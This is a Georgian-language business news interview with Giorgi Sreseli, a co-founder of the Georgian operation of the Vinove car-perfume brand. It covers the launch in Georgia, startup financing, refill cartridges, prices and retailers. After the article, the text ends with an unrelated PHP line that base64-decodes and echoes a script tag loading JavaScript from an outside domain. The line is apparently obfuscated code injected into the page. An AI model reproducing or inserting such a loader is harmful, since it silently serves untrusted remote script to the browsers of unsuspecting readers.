celsiusi
ავერსი საქკაბელი
საერთაშორისო კომპანია – Vinove უკვე საქართველოშია, რომელიც პრემიუმ ხაზის პარფიუმერიას ავტომობილებისთვის აწარმოებს და  შეიძლება თამამად ითქვას, რომ ის უნიკალურია, როგორც ნაკეთობის კუთხით, ასევე პარფიუმის ხარისხის თვალსაზრისით. კომპანია Vinove დაარსდა 2016 წელს და უდავო ლიდერია პოლონურ და საერთაშორისო ბაზარზე. 
როგორც კომპანიაში სიამაყით აცხადებენ, პარფიუმი იქმნება საფრანგეთში, დიზაინი კი იტალიაში, ხოლო საბოლოოდ პროდუქტის წარმოება პოლონეთში ხორციელდება გერმანული ხარისხის სტანდარტების მიხედვით.
Vinove-ს საქართველომდე გზა
"საერთაორისო ბრედნთან მოლაპარაკებები რამდენიმე თვის წინ დავიწყეთ, არ იყო მარტივი პორცესი, ვინაიდან მოგეხსენებათ, რომ საერთაშორისო ბრენდის დარწმუნება არც თუ ისე მარტივი საქმეა, იმის გათვალისწინებით, რომ საქართველოს ბაზარი არც თუ ისე დიდია. თუმცა, დღეს სიხარულით აღვნიშნავთ, რომ ბრენდი უკვე წარმოდგენილია საქართველოში", - ამის შესახებ საინფორმაციო სააგენტო BUSINESS TIME-ს კომპანია Vinove-ს საქართველოში თანადამფუძნებელი გიორგი სრესელი უყვება. 
344283847 3450865285172666 8123573329178291224 n
როგორც გიორგი სრესელი განმარტავს, ავტომობილისთვის გათვლილი მაღალი ხარისხის პარფიუმის დეფიციტმა გადააწყვეტინა ამ მიმართულებით ოპერირებაზე ეფიქრა. 
„დაახლოებით, 5 თვეზე მეტი დაგვჭირდა საერთაშორისო დონეზე ამ ბრენდზე გავსულიყავით, დავიწყეთ საქმიანი წინადადების და პარტნიორობის შეთავაზება, მოვახდინეთ მათი დაინტერესება, დარწმუნება სტაბილურობის გარანტიების კუთხით. ბრენდმა ნდობა გამოგვიცხადა და გამოგვყვა საქართველოში, ის დღეს სრულად არის წარმოდგენილი ჩვენს ბაზარზე, რამდენიმე კვირაა რაც ოპერირება დავიწყეთ. უნდა აღვნიშნო, რომ ამ მოკლე პერიოდში უკვე უკუკავშირი საკმაოდ აქტიურია მომხმარებლის მხრიდანაც, ჩანს დაინტერესება, მოწონება, რაც შეიძლება ითქვას სტარტაპისთვის წარმატებული დასაწყისია“, - ამბობს გიორგი სრესელი.
ფინანსები სტარტაპისთვის
გიორგი სრესელის თქმით,  საქართველოში სტარტაპი დიდი გამოწვევების წინაშე დგას  ფინანსური კუთხით. შესაბამისად, ფინანსური რესურსის მოძიება მის  მეგობართან, თანადამფუძნებელ გიორგი ზურებიანთან ერთად მოახდინეს და დაიწყეს ავტომობილის პარფიუმერიის მიმართულებით ოპერირება.
„მოგეხსენებათ მსგავს სიახლეს ყოველთვის ახლავს გარკვეული ფინანსური რისკები, ამიტომ საფინასო ინსტიტუტები ასეთ შემთხვევებში ვერ შემოდიან დაფინანსებით, ალბათ დაგვაკვირდებიან უახლოესი 6 თვის განმავლობაში და შემდგომ  თანამონაწილეობის კუთხით ვფიქრობ, რომ მათთან თანამშრომლობა გამოგვივა. დარმწუნებული ვართ იმაში, რომ ბრენდს ბაზარი მიიღებს და ჩვენი ბიზნესი მალე  გაზირდება“, - გვიხსნის იმედიანად გიორგი სრესელი. 
რას თავაზობს კომპანია? 
Vinove – იყენებს გამყარებულ სუნამოს, ინოვაციურ ტექნოლოგიას პოლიმერში, რომლის ოპტიმალური ფორმის მეშვეობით გამოიყოფა დახვეწილი სურნელი – არომატი, რომლის სურნელი 90 დღის განმავლობაში ნარჩუნდება.  ტენდეციური სუნამოების ხაზი წარმოდგენილია შემდეგ კოლექციებში: MAN, FAMILY, WOMAN, OUD / WOOD, PRESTIGE WOOD LINE...
 
რაც შეეხება ვიზუალს, აღსანიშნავია, რომ ვიზუალზე ნამუშევარი აქვთ იტალიის წამყვან დიზაინერებს, რომელიც ძალიან შთამბეჭდავია. პარფიუმერიას აწარმოებენ ლეგენდარული ფრანგი პარფიუმერიის შემქნელები. უშუალოდ ნაკეთობის დამზადება და წარმოება კი  ხდება პოლონეთში, გერმანული სტანდარტების დაცვით. 
ვინოვე 
პარფიუმს აქვს ასევე ხის ხაზი – ამერიკული კაკალის, შავი მუხის, იფანის (კოპიტის) ვიზუალით, რაც უფრო მეტად ამდიდრებს და  ელეგანტურს ხდის  ყველანაირი მოდელის ავტომობილის ინტერიერს, ერწყმის და უხდება.  ასევე, წარმოდგენილია  იუველირის ხაზი მანდილოსნებისთვის, რომლის ვიზუალი გამორჩეულია მისი განსხვავებული იუველირი ნამუშევრით. 
 
როგორც სრესელი განმარტავს პროდუქცია გამორჩეულია იმით, რომ არ იწვევს რესპირატორულ გართულებებს, თავის ტკივილს და სხვა არასასიამოვნო უკუჩვნებებს, მაშინაც კი, როცა ავტომობილის ყველა ფანჯარა დახურულია დიდი ხნის განმავლობაში, ან დიდ მანძილზე უწევთ მგზავრობა. მას არ გააჩნია მძაფრი ტონები და შემაწუხებელი სურნელი, ყოველმხრივ დაბალნსებული და რბილი გრადაციებით გამოირჩევა მაქსიმალურ კომფორტს და ამაღლებულ განწყობას უქმნის მომხმარებელს .
 
კომპანია Vinove არის ორიენტირებული ე.წ. “Refill”- კატრიჯებზე! 
„რაც ნიშნავს ეს? – ეს ნიშნავს იმას, რომ სამი – ოთხი  თვის შემდეგ ადამიანს აღარ უწევს მის მიერ შერჩეული პროდუქტის მოცილება. ის მოწყობილობა, რჩება მის ავტომობილში და შემდგომ უკვე ვადის გასვლის შემდეგ ახდენს მხოლოდ პარფიუმის კატრიჯის შეცვლას, რაც არის ინოვაციური მეთოდი. ინოვაციაში იგულისხმება ისიც, რომ თანაბრად გამოიყოფა სურნელი და ყოველდღიურად არ ხდება ჭარბი სურნელის დადგომა ავტომობილში, ახასიათებს ნოტებს შორის რბილი გრადაციები, სამი ოთხი თვის შემდეგ ადამიანს შეუძლია ხელახლა აირჩიოს მისთვის სასურველი სურნელი, არჩევანში არსებული 15-მდე სხვადასხა არომატის-სურნელის მიხედვით, ან კვლავ დაუბრუნდეს მისთვის უკვე ცნობილ და არჩეულ სურნელს“ - გვიხნის გიორგი სრესელი.
ფასი მნიშვნელოვანია! 
გიორგი სრესელი საინფორმაციო სააგენტო „Business Time-ს კითხვაზე, თუ რა ღირს პროდუქტი და რა სეგმენტზეა გათვლილი, ასე პასუხობს: ექვსი სამოდელო ხაზი გვაქვს, როგორც ბიუჯეტური ისე შედარებით მაღალ ფასიანი, შესაბამისად პროდუქცია გათვლილია სხვადასხვა სეგმენტზე,  Vinner Line - 22.95 ლარი ღირს, Tvister Line - 27.95, Original Line - 43.95, OUD/Wood Line - 49.90, Wood Line - 59.50, Jewelry Line კი - 59.50 ლარი, ხოლო კატრიჯებს რაც შეეხება 15 სხვადასხვა სურნელოვანი ვერსია დახვდება მომხმარებლებს და  ღირს მხოლოდ - 19.90 ლარი. 
„ამ ეტაპზე საქართველოში შესაძლებელია შეიძინოთ ელექტრონულ პლატფორმა – EXTRA.GE–ზე, სტენდები კი წარმოდგენილია მაღაზია „ეკოვუდის“ ქსელში, „ნოვას“ ჰიპერმარკეტების ქსელში, „გორგიაში“, ასევე, უახლოეს პერიოდში შევა „ბრიკორამაში“ და სხვა ამ ტიპის ქსელურ მარკეტებში“, - გვითხრა გიორგი სრესელმა.  
სამომავლო გეგმები
გიორგი სრესელის განმარტებით, სამომავლოდ იგეგმება ასევე პროდუქტის რეგიონებში გატანა, ხელმისაწვდომობის ზრდა და  სხვადასხვა ხაზის დამატება.   
„კომპანიის სამოდელო ხაზი სრულად შემოვიტანეთ ჩვენს ბაზარზე და ვფიქრობთ, რომ კიდევ უფრო გავაფართოვოთ. ჩვენი სურვილია, როგორც სამოდელო ხაზის გაზრდა, ასევე ლოკაციურადაც მეტად ხელმისაწვდომი გავხადოთ პროდუქცია მომხმარებლებისთვის, ვგულისხმობ, სხვადასხვა დიდ ქალაქებში ოპერირებას, არა მხოლოდ  ონლაინ კუთხით, არამედ სტენდების განთავსებით“, - დასძინა გიორგი სრესელმა. 
3307
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");